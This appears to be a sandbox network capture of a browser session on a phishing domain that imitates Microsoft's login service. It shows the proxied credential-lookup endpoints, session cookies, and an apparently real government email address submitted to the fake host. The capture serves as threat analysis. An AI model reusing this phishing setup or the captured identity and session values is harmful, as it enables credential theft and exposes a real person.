Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:50 UTC	859	OUT	GET /Me.htm?v=3 HTTP/1.1 Host: live.loraintoolsltd.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; uaid=2d7a76ebbf584765830210384afdfe30; MSPRequ=id=N&lt=1737673427&co=1
2025-01-23 23:03:50 UTC	17	IN	HTTP/1.1 200 OK
2025-01-23 23:03:50 UTC	34	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 30 0d 0a Data Ascii: Cache-Control: max-age=315360000
2025-01-23 23:03:50 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:50 UTC	40	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: text/html; charset=utf-8
2025-01-23 23:03:50 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 35 30 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:50 GMT
2025-01-23 23:03:50 UTC	40	IN	Data Raw: 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 31 20 4a 61 6e 20 32 30 33 35 20 32 33 3a 30 33 3a 35 30 20 47 4d 54 0d 0a Data Ascii: Expires: Sun, 21 Jan 2035 23:03:50 GMT
2025-01-23 23:03:50 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:50 UTC	43	IN	Data Raw: 50 70 73 65 72 76 65 72 3a 20 50 50 56 3a 20 33 30 20 48 3a 20 42 4c 30 32 45 50 46 30 30 30 32 44 42 36 39 20 56 3a 20 30 0d 0a Data Ascii: Ppserver: PPV: 30 H: BL02EPF0002DB69 V: 0
2025-01-23 23:03:50 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
2025-01-23 23:03:50 UTC	124	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 75 61 69 64 3d 64 36 62 35 32 66 61 63 62 62 61 32 34 65 34 39 62 36 37 36 38 31 38 36 33 31 35 64 62 37 37 33 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 69 76 65 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: uaid=d6b52facbba24e49b6768186315db773; Path=/; Domain=live.loraintoolsltd.xyz; HttpOnly; Secure; SameSite=None
2025-01-23 23:03:50 UTC	118	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4d 53 50 52 65 71 75 3d 69 64 3d 4e 26 6c 74 3d 31 37 33 37 36 37 33 34 33 30 26 63 6f 3d 32 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 69 76 65 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: MSPRequ=id=N&lt=1737673430&co=2; Path=/; Domain=live.loraintoolsltd.xyz; HttpOnly; Secure; SameSite=None

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:51 UTC	3095	OUT	POST /common/GetCredentialType?mkt=en-US HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive Content-Length: 1990 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" hpgrequestid: dba54b01-eaa7-46d4-b2f8-6a44c3c02200 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 client-request-id: afbe7e5d-b817-4cfb-925a-fa049f49afdb canary: PAQABDgEAAABVrSpeuWamRam2jAF1XRQEQmOuqvsaY3unIlM6DTkSud8L5Kk9ZY1HXpIjpi_TApDMTAstcoyVbZgZtssZYmF9inlzn0_hdviQ-ZVR9WJS3lrloGS4hdpilW47O2_R4D8LjKISzB8VhvM-lJD2QVrV9CBgF3BlhyozTfPVYX8kpyRcvI84-LmeyjqeJPQTOekRS_4RXTFAqkpZSjtvvxeKCv2-lLCZpJxGksDB1jUFuiAA Content-type: application/json; charset=UTF-8 hpgid: 1104 Accept: application/json hpgact: 1800 sec-ch-ua-platform: "Windows" Origin: https://login.loraintoolsltd.xyz Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-kz8rlQGIpI=AQABCQEAAABVrSpeuWamRam2jAF1XRQEzRIUEQeY1D7eLy0UQxpcxWfgOYW4VTYJZCD75yzqGkapbvfuaYKkpTy2mv2vw2KguJ9zQ-zHquZTfpM33qLZDvn6Nzt9C_xs0-b38fDlKISNFCmoKrpmb57W8yR58RcmoEtDHD2TLqL2agxSHYKE5iAA; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AS0AMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAAtAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEk7YvPRcILejnsM1UfrvwdbGJMpQlp_1aQhRnmx5bQAfrxRJ_YExbmtTohJou51Tr9u80yoxUddLmSc-3tGqupx7sQHvP9sxIvYjo2uTmRqwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEbh5U_b2lXXlkWdBw15H1nltYS48hzQFKvrNs8a26xJzkrxDA3rQETN_dTHEO6d90h4CXYEL0gqAU2aq7aczv3xWANpjo6qlbbFpTNOkQbwhKRcaODI7-a8rfXeqaH0leh_WcKAJj6FIqb9DR1xf3LpiKlFMtdnyxGLr6tueQGSAgAA; esctx-KeWr5fCcHs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEhCKvyeaBtgfFPqn6YpqWoZqHxfdP2vHMx3-SNzYIDcX3sRa1AziUABwGDf4Dt5_5DGrfiWSZlH2oI6IcWQhmyA9-_a6PfkaqL80fuxl3kGFv7Dt6BtH4-1HEIhX8Zph4UDlyZWFW74DClBgQMRNkQiAA; fpc=AiumHXxYOuNFj4o [TRUNCATED]
2025-01-23 23:03:51 UTC	1990	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 75 73 61 6e 2e 6b 61 6c 63 72 6f 66 74 40 73 74 61 74 65 2e 6e 65 2e 67 6f 76 22 2c 22 69 73 4f 74 68 65 72 49 64 70 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 68 65 63 6b 50 68 6f 6e 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 52 65 6d 6f 74 65 4e 47 43 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 69 73 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 53 68 6f 77 6e 22 3a 66 61 6c 73 65 2c 22 69 73 46 69 64 6f 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 6f 72 69 67 69 6e 61 6c 52 65 71 75 65 73 74 22 3a 22 72 51 51 49 41 52 41 41 68 5a 49 37 6a 4e 74 30 41 4d 62 74 35 43 35 33 46 31 45 61 46 51 52 6c 4f 79 47 47 71 73 57 4a 38 5f 66 37 70 41 36 35 4f 47 5f 48 50 69 65 4f 63 37 61 45 49 6a 38 54 50 32 49 6e Data Ascii: {"username":"susan.kalcroft@state.ne.gov","isOtherIdpSupported":true,"checkPhones":false,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":true,"originalRequest":"rQQIARAAhZI7jNt0AMbt5C53F1EaFQRlOyGGqsWJ8_f7pA65OG_HPieOc7aEIj8TP2In
2025-01-23 23:03:52 UTC	17	IN	HTTP/1.1 200 OK
2025-01-23 23:03:52 UTC	35	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Cache-Control: no-store, no-cache
2025-01-23 23:03:52 UTC	57	IN	Data Raw: 43 6c 69 65 6e 74 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 61 66 62 65 37 65 35 64 2d 62 38 31 37 2d 34 63 66 62 2d 39 32 35 61 2d 66 61 30 34 39 66 34 39 61 66 64 62 0d 0a Data Ascii: Client-Request-Id: afbe7e5d-b817-4cfb-925a-fa049f49afdb
2025-01-23 23:03:52 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:52 UTC	47	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: application/json; charset=utf-8
2025-01-23 23:03:52 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 35 31 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:51 GMT
2025-01-23 23:03:52 UTC	13	IN	Data Raw: 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a Data Ascii: Expires: -1
2025-01-23 23:03:52 UTC	101	IN	Data Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
2025-01-23 23:03:52 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:52 UTC	18	IN	Data Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Pragma: no-cache